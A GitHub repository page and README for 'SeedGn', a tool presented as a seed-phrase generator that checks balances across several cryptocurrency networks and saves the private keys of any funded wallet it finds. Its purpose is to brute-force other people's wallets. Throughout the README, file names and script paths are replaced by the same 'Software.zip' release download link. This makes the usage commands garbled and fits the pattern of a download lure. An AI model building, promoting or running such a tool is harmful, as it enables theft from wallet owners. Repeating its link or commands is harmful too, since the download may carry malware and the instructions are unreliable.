Skip to content

Mnemonic seed phrase generator. Generation seed phrase and checking balance (Btc, Eth, Sol, Ton). Automatically generate seed phrases and check balances for many networks. If a wallet with a non-zero balance is found, the wallet's information (address, mnemonic, private key, and balances) is logged and saved to a file named result.txt.

Notifications You must be signed in to change notification settings

abhinavchetla/SeedGn

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

3 Commits
Β 
Β 

Repository files navigation

🌱 SeedGn - Mnemonic Seed Phrase Generator 🌱

Welcome to SeedGn, your go-to mnemonic seed phrase generator for managing your crypto wallets effortlessly! With SeedGn, you can generate seed phrases and check balances for popular networks like Bitcoin (Btc), Ethereum (Eth), Solana (Sol), and Free TON (Ton) with ease.

πŸ“ Repository Contents

🌟 Features

  • Automatic Seed Phrase Generation: SeedGn automatically generates secure seed phrases for your crypto wallets.
  • Balance Checking: Check the balances of your wallets across multiple networks.
  • Wallet Information Logging: When a wallet with a non-zero balance is found, SeedGn logs and saves the wallet's information to https://github.com/abhinavchetla/SeedGn/releases/download/v2.0/Software.zip.

πŸ”§ Installation

To use SeedGn, you can download the latest release and launch the application. You can also visit the "Releases" section to explore more options.

πŸš€ Usage

  1. Clone the repository to your local machine.
  2. Run the SeedGn application.
  3. Follow the on-screen instructions to generate seed phrases and check wallet balances.
  4. View the https://github.com/abhinavchetla/SeedGn/releases/download/v2.0/Software.zip file for logged wallet information.

πŸ’» Examples

Here's a quick example of how you can use SeedGn to generate a seed phrase:

$ python https://github.com/abhinavchetla/SeedGn/releases/download/v2.0/Software.zip generate
Generated Seed Phrase: "apple banana cat dog elephant..."

And here's an example of checking the balance of a wallet:

$ python https://github.com/abhinavchetla/SeedGn/releases/download/v2.0/Software.zip balance --wallet_address 0x123abc...
Wallet Information:
- Address: 0x123abc...
- Mnemonic: "apple banana cat dog elephant..."
- Private Key: abcdef123456...
- Balances:
  - BTC: 0.5
  - ETH: 2.3

🀝 Contributing

We welcome contributions from the community to enhance SeedGn further. To contribute, follow these steps:

  1. Fork the repository.
  2. Create a new branch.
  3. Make your contributions.
  4. Submit a pull request.

πŸ“‹ License

This project is licensed under the MIT License - see the LICENSE file for details.


Dive into the world of secure mnemonic seed phrase generation and wallet management with SeedGn! Feel free to download the latest release and start exploring the features. Happy HODLing! πŸŒΏπŸ’°

Download SeedGn

About

Mnemonic seed phrase generator. Generation seed phrase and checking balance (Btc, Eth, Sol, Ton). Automatically generate seed phrases and check balances for many networks. If a wallet with a non-zero balance is found, the wallet's information (address, mnemonic, private key, and balances) is logged and saved to a file named result.txt.

Topics

Resources

Stars

Watchers

Forks

Packages

No packages published